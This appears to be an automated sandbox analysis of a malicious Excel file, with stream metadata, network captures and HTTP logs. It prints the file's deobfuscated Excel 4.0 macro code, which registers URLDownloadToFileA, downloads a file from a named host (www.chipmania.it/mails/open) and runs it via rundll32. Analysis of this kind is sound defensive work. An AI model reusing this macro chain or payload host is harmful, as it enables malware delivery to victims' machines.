                                                                                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                                          General
                                                                                                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                                                                                          Entropy:0.247217286775
                                                                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                                                                                                                          General
                                                                                                                                                                                                                                          Stream Path:Workbook
                                                                                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                                          Stream Size:157800
                                                                                                                                                                                                                                          Entropy:7.46869820242
                                                                                                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                                                                                                          Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                                                                                                          Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                                                                                          ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                                                                                                                          "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.868774891 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.927129030 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.927299976 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.928121090 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.988651037 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044298887 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044332981 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044361115 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044384956 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044409037 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044431925 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044455051 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044478893 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044486046 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044502974 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044529915 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044542074 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044569016 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044596910 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105459929 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105536938 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105592966 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105649948 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105705023 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105742931 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105767012 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105815887 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105825901 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105880976 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105937004 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105968952 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.105992079 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106007099 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106046915 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106105089 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106118917 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106161118 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106220961 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106229067 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106280088 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106316090 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106334925 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106365919 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106391907 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106446981 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106456041 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106501102 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106559992 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106584072 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106654882 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.106744051 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165138006 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165200949 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165241957 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165313005 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165376902 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165472984 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165513039 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165527105 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165581942 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165616989 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165638924 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165702105 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165721893 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165760040 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165802956 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165817022 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165873051 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165874958 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165927887 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165977955 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.165982008 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166037083 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166083097 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166093111 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166145086 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166156054 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166213036 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166244030 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166266918 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166322947 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166342020 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166378975 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166419029 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166431904 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166485071 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166524887 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166538000 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166598082 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166619062 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166657925 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166692972 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166713953 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166770935 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166779995 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166827917 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166842937 CET4970880192.168.2.3185.81.0.78
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166879892 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166933060 CET8049708185.81.0.78192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.166939974 CET4970880192.168.2.3185.81.0.78

                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:25.056622982 CET5128153192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:25.108442068 CET53512818.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:25.766691923 CET4919953192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:25.826699018 CET53491998.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:31.353473902 CET5062053192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:31.402091026 CET53506208.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:32.329978943 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:32.391809940 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:32.830549955 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:32.891782999 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:33.861175060 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:33.921305895 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:34.874327898 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:34.937809944 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:35.650307894 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:35.701301098 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.803484917 CET5598453192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.866786003 CET53559848.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.889669895 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.952003956 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.981296062 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:37.032500982 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:38.137955904 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:38.189670086 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:39.307830095 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:39.364801884 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:40.452696085 CET6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:40.501591921 CET53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:40.905376911 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:40.957083941 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:41.531738043 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:41.580586910 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:43.147778034 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:43.199512005 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:45.385746956 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:45.442715883 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:46.561105013 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:46.609842062 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:48.702016115 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:48.759447098 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:50.088953972 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:50.149183989 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:51.200606108 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:51.252902031 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:52.189508915 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:52.238189936 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:53.451216936 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:53.499876976 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:54.886091948 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:54.938659906 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:54.943166018 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:54.987376928 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:55.856301069 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:55.916192055 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:56.845870018 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:56.897119999 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:58.954931974 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:59.019512892 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:12.786480904 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:12.865119934 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.960248947 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:16.019335985 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:33.101217985 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:33.153033018 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:38.946036100 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:39.009613991 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:14:08.611212015 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:14:08.665509939 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:14:15.340127945 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:14:15.413685083 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:15:17.404215097 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:15:17.473490000 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:15:19.512118101 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:15:19.621140957 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                                          Feb 20, 2021 02:15:20.695379019 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                                          Feb 20, 2021 02:15:20.781733990 CET53636198.8.8.8192.168.2.3

                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.803484917 CET192.168.2.38.8.8.80x4245Standard query (0)www.chipmania.itA (IP address)IN (0x0001)

                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.866786003 CET8.8.8.8192.168.2.30x4245No error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.866786003 CET8.8.8.8192.168.2.30x4245No error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)

                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                          • www.chipmania.it

                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                          0192.168.2.349708185.81.0.7880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                          Feb 20, 2021 02:12:36.928121090 CET1265OUTGET /mails/open.php HTTP/1.1
                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                          Host: www.chipmania.it
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Feb 20, 2021 02:13:15.044298887 CET1561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Sat, 20 Feb 2021 01:12:36 GMT
                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="8.jjkes"
                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                          Connection: Upgrade, Keep-Alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=1, max=100
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
